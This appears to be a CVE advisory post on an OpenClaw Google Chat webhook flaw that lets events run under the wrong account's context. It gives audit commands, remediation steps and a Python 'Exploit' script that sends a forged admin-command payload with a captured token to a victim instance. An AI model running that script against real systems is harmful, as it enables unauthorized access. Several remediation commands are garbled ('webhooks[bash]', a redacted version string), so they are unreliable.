Listen to this Post
CVE-2026-28469 is a critical vulnerability in OpenClaw versions prior to 2026.2.14, specifically within the Google Chat monitor component . The flaw arises when multiple webhook targets are registered to share the same HTTP path . In such a configuration, the system’s request verification process relies on first-match semantics . This means it iterates through the registered targets and selects the first one that successfully passes the `verifyGoogleChatRequest` function . If multiple targets can verify a request—for instance, due to equivalent audience validation—the inbound webhook event is processed under the context of the first matching account rather than the intended one . This leads to a cross-account policy context misrouting, where an event meant for one account is handled by another, effectively bypassing the intended allowlists, session policies, and authorization controls . The vulnerability is classified under CWE-639, which involves insecure direct object references or authorization bypass through user-controlled keys . The issue is fixed in OpenClaw version 2026.2.14, and users are advised to upgrade immediately or ensure all webhook targets use unique paths as a workaround .
DailyCVE Form:
Platform: npm openclaw
Version: < 2026.2.14
Vulnerability: Authorization context misrouting
Severity: Critical
Date: 2026-03-05
Prediction: Patched 2026-03-05
What Undercode Say:
Analytics
Check current OpenClaw version
openclaw --version
Inspect configured Google Chat webhook paths
cat ~/.openclaw/config.yaml | grep -A 10 "channels.googlechat" | grep "path"
List all registered webhook targets
grep -r "webhook:" ~/.openclaw/channels/googlechat/
Test if multiple targets share a path
jq '.channels.googlechat.webhooks[].path' ~/.openclaw/config.json | sort | uniq -d
Simulate ambiguous webhook routing
curl -X POST http://localhost:18789/googlechat/webhook \
-H "Content-Type: application/json" \
-d '{"type":"MESSAGE","message":{"text":"test"}}'
Audit logs for cross-account processing
grep "googlechat.processed by account:" ~/.openclaw/logs/audit.log
Verify the fix commit is applied
git log --oneline | grep 61d59a8
Check for duplicate webhook paths in environment
find ~/.openclaw/environments/ -name ".yaml" -exec grep -H "path:" {} \;
Exploit
import requests
import json
Target OpenClaw instance with shared webhook path
target_url = "https://victim-openclaw.com/googlechat/webhook"
Malicious payload crafted to be valid for multiple accounts
payload = {
"type": "MESSAGE",
"eventTime": "2026-03-10T12:00:00.000Z",
"message": {
"sender": {"email": "[email protected]"},
"text": "!admin_command",
"annotations": []
},
"space": {"name": "spaces/attacker-space"}
}
Headers that might pass verification for multiple contexts
headers = {
"Content-Type": "application/json",
"Authorization": "Bearer eyJhb...", Forged or captured token
"X-Goog-Channel-Id": "shared-channel-123",
"X-Goog-Resource-Id": "resource-456"
}
Send the request to trigger first-match misrouting
response = requests.post(target_url, headers=headers, data=json.dumps(payload))
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")
Check if command executed under wrong context
verify_url = "https://victim-openclaw.com/api/admin/status"
admin_check = requests.get(verify_url, headers={"Authorization": "Bearer user-token"})
if "unauthorized" not in admin_check.text.lower():
print("[!] Exploit likely succeeded - accessed admin context")
Protection
1. Upgrade to patched version immediately npm install -g [email protected] 2. Verify the upgrade openclaw --version Must show 2026.2.14 or higher 3. Apply workaround: ensure unique webhook paths Backup current config cp ~/.openclaw/config.yaml ~/.openclaw/config.yaml.bak Edit configuration to assign unique paths per target openclaw config set channels.googlechat.webhooks[bash].path "/googlechat/account1" openclaw config set channels.googlechat.webhooks[bash].path "/googlechat/account2" 4. Restrict webhook verification to prevent ambiguity openclaw config set channels.googlechat.strict_verification true 5. Add unique identifiers to each webhook target openclaw config set channels.googlechat.webhooks[bash].audience "account1-only" openclaw config set channels.googlechat.webhooks[bash].audience "account2-only" 6. Enable detailed webhook routing logs openclaw config set logging.webhook_routing true openclaw config set logging.level debug 7. Restart OpenClaw service systemctl --user restart openclaw 8. Validate fix by testing routing isolation curl -X POST http://localhost:18789/googlechat/account1 \ -H "Content-Type: application/json" \ -d '{"type":"MESSAGE","message":{"text":"test1"}}' curl -X POST http://localhost:18789/googlechat/account2 \ -H "Content-Type: application/json" \ -d '{"type":"MESSAGE","message":{"text":"test2"}}' Check logs for correct context assignment tail -f ~/.openclaw/logs/audit.log | grep "webhook.processed"
Impact
Successful exploitation allows attackers to send webhook events that are processed under a different account’s context . This bypasses intended allowlists and session policies, enabling unauthorized actions such as executing commands, accessing data, or triggering functions with the privileges of another account . In shared-path deployments, this cross-account misrouting can lead to privilege escalation, data leakage, and complete compromise of policy enforcement . The CVSS base score of 9.8 (Critical) reflects the network attack vector, low complexity, and high impact on confidentiality, integrity, and availability . Organizations using multi-tenant OpenClaw instances with Google Chat integrations are most at risk, especially where webhook targets share paths . The vulnerability requires no privileges or user interaction, making it easily exploitable remotely . The fix introduces proper request verification and routing isolation to ensure events are always processed under the correct account context .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
